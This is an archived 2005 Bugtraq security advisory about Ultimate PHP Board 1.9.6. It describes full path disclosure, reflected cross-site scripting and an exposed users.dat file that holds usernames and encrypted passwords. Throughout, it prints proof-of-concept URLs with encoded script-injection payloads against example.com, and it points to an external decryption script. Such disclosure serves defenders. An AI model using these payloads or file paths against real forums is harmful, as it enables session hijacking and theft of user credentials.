lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001101c5726f$ad322c50$0100a8c0@alberto>
Date: Thu, 16 Jun 2005 14:34:00 +0200
From: "Alberto Trivero" <trivero@...py.it>
To: <vuln@...irt.com>, <submissions@...ketstormsecurity.org>,
	<news@...uriteam.com>, <bugtraq@...urityfocus.com>
Subject: M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD


M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD

Published: 06 16 2005

Released: 06 16 2005

Name: Ultimate PHP Board (UPB)

Affected Systems: <= 1.9.6 GOLD

Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information
Disclosure

Author: Alberto Trivero

Vendor: http://www.myupb.com/ourscripts_upb.php





Software Description

***********


"UPB is a forum/message board script. It supports threaded discussion with a
comprehesive text database system that we wrote here at php outburst for the
backend."



Full Path Disclosure

*******


Thanks to an improper control of the value of some variables it's possible
to cause some errors and obtain the full path by sending simples requests
like these:

    http://www.example.com/upb/viewtopic.php?id=0
    http://www.example.com/upb/profile.php?action=get&id=0
    http://www.example.com/upb/newpost.php?t_id=0



Cross-Site Scripting (XSS)

*******


Let's look at code from login.php at line 69:

    <?
    ...
    echo "<form action='login.php?ref=$ref&l=1' method=POST>

    <center>$skin_tableheading
    ...
    ?>

The $rev parameter can be controlled by a remote user and when UPB get the
value don't sanitise properly it, so a malicious user can inject some HTML
code like this:

    '><script>alert(document.cookie)</script>

that will change the HTML line in:

    <form
action='login.php?ref='><script>alert(document.cookie)</script>&l=1'
method=POST>

executing the <script>...</script> tag that show, in this case, the cookies.
This is the PoC URL:


http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.co
okie)%3C/script%3E

Let's look now at code from viewtopic.php at line 13:

    <?
    ...
    $where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a>
<b>></b> $w_topic[subject]";
    ...
    ?>

We can notice in the $id parameter the same preceding problem explottable
with an URL like this:


http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document
.cookie)%3C/script%3E

These are other PoC URLs for other parameters:


http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.c
ookie)%3C/script%3E

http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.coo
kies)%3C/script%3E

http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E

http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E

http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(d
ocument.cookie)%3C/script%3E



Sensitive Information Disclosure

*********


In many cases (every time with non Apache webservers but some time also with
its) it's possible to obtain sensitives informations about all the users
registered on the UPB forum by surfing on this file:

    http://www.example.com/upb/db/users.dat

and viewing informations structured in this way:


user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>u
rl<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id

The passwords of users are crypted and for automate the decription I made a
code available at this address: http://albythebest.altervista.org/upb.pl



Solution

*********


The vendor has been contacted many times but a patch was not yet produced.



Alberto Trivero - trivero@...py.it

Come cheer us at #security-it on Freenode ( irc.freenode.net )

(C) 2005 Copyright by Madroot Security Group



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ